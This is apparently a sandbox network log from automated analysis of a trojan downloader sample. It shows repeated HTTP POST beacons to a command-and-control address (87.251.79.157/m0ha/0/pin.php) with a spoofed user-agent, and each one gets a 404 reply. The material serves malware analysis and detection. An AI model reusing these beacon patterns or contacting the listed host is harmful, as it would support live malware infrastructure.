                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:17.449021101 CET1173INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:17 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              23192.168.2.54971987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:17.695734024 CET1173OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:17.987251043 CET1174INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:17 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              24192.168.2.54972087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:18.244798899 CET1175OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:18.718091965 CET1175INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:18 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              25192.168.2.54972187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:18.964073896 CET1176OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:19.322257996 CET1177INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:18 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              26192.168.2.54972287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:19.791692972 CET1177OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:20.117541075 CET1178INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:19 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              27192.168.2.54972387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:20.361541986 CET1179OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:20.618340969 CET1179INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:20 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              28192.168.2.54972487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:21.004333973 CET1180OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:21.287939072 CET1181INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:21 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              29192.168.2.54972587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:22.062017918 CET1181OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:23.039788008 CET1182INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:22 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.54969887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:01.352142096 CET1135OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:01.791879892 CET1136INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:01 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              30192.168.2.54972687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:23.293570042 CET1183OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:25.291951895 CET1183INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:23 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              31192.168.2.54972787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:25.581074953 CET1184OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:26.542694092 CET1185INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:25 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              32192.168.2.54972887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:26.790848017 CET1185OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:27.122605085 CET1186INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:26 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              33192.168.2.54972987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:27.364125967 CET1187OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:27.610562086 CET1188INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:27 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              34192.168.2.54973087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:27.852823019 CET1188OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:28.146226883 CET1189INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:27 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              35192.168.2.54973187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:28.400491953 CET1190OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:28.677202940 CET1190INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:28 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              36192.168.2.54973287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:28.911928892 CET1191OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:29.195779085 CET1192INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:28 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              37192.168.2.54973387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:29.450562000 CET1192OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:29.706804037 CET1193INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:29 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              38192.168.2.54973487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:29.958482027 CET1194OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:30.265338898 CET1194INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:29 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              39192.168.2.54973587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:30.516411066 CET1195OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:30.769006014 CET1196INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:30 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.54969987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:02.461606026 CET1136OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:02.822240114 CET1137INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:02 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              40192.168.2.54973687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:31.008223057 CET1196OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:31.407385111 CET1197INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:31 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              41192.168.2.54973787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:31.655733109 CET1198OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:32.298558950 CET1198INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:31 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              42192.168.2.54973887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:32.541887045 CET1199OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:33.109786034 CET1200INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:32 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              43192.168.2.54973987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:33.365221024 CET1200OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:33.615084887 CET1201INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:33 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              44192.168.2.54974087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:33.848928928 CET1202OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:34.100250959 CET1202INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:33 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              45192.168.2.54974187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:34.358577967 CET1203OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:34.628392935 CET1204INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:34 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              46192.168.2.54974287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:34.878601074 CET1204OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:35.166644096 CET1205INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:34 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
